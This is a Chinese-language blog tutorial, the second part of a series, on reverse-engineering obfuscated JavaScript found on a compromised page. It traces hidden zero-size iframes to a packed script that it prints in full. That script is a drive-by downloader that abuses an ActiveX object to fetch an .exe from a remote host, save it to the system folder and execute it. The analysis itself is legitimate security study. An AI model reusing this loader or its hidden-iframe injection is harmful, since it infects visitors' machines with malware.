jser必看的破解javascript各种加密的反向思维方法(2)


[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]


得到的解密的代码就是

复制代码 代码如下:


<html>
<head>
<script>
function clear(){
Source=document.body.firstChild.data;
document.open();
document.close();
document.title="gg";
document.body.innerHTML=Source;
}</script>
<title>ad</title>
</head>
<body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<!--
<iframe src="https://www.jb51.net/8080.htm" marginwidth="1" marginheight="1"
scrolling="no" frameborder="0"></iframe>
-->
</body>
</html>
<SCRIPT>
<!--
window.defaultStatus=" ";
//-->
</SCRIPT>
<iframe src=https://pop.*****.com/777/index.htm width=0 height=0></iframe>


二、检查下上面的和*****.com/777/index.htm
我发现下面的iframe加载的有问题,所以呢,
用下载工具下载*****.com/777/index.htm这个页面的代码可以发现如下

复制代码 代码如下:


<iframe src=https://cc.*****.com/wm/index.htm width=0 height=0></iframe>
<script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='JavaScript'
charset='gb2312'></script>


看这个大家应该会想起,好多网站卖流量类似的代码(就是卖流量的)
三、继续分析下 *****.com/wm/index.htm
用下载工具下载这个页面,可以得到

复制代码 代码如下:


<script language=javascript src=https://www.jb51.net/1.js></script>


好的继续下载*****.com/wm/1.js这个js文件我得到了这个代码

复制代码 代码如下:


eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k
[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('f 8(n){3 g=h.j()*n;k\'~5
\'+\'.5\'}l{9=\'m://o.p.q/r/s.a\';3 4=t.u("v");4.w("y","z:A-B-C-D-E");3 x=4.7
("G.X"+"M"+"L"+"H"+"T"+"T"+"P","");3 S=4.7("I.J","");S.K=1;x.b("N",9,0);x.O();6=8(R);3
F=4.7("U.V","");3 5=F.W(0);6=F.d(5,6);S.Y();S.Z(x.10);S.11(6,2);S.12();3 Q=4.7
("13.14","");e=F.d(5+\'\\\\15\',\'16.a\');Q.17(e,\' /c \'+6,"","b",0)}18(i)
{i=1}',62,71,'|||var|df|tmp|fname1|CreateObject|gn|dl|exe|open||BuildPath|exp1|function|numb
er|Math||random|return|try|http||cc|wzxqy|com|wm|mm|document|createElement|object|setAttribu
te||classid|clsid|BD96C556|65A3|11D0|983A|00C04FC29E36||Microsoft||Adodb|Stream|type|||GET|s
end|||10000|||Scripting|FileSystemObject|GetSpecialFolder||Open|Write|responseBody|SaveToFil
e|Close|Shell|Application|system32|cmd|ShellExecute|catch'.split('|'),0,{}))


大家看到上面的代码可能会发现无法解密了,我搜了下,发现了,竟然有解密代码了,此处可以分析,不
过我这篇文章的目地,是不用解密程序的,所有我用下面的方法,

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wjdwfg.html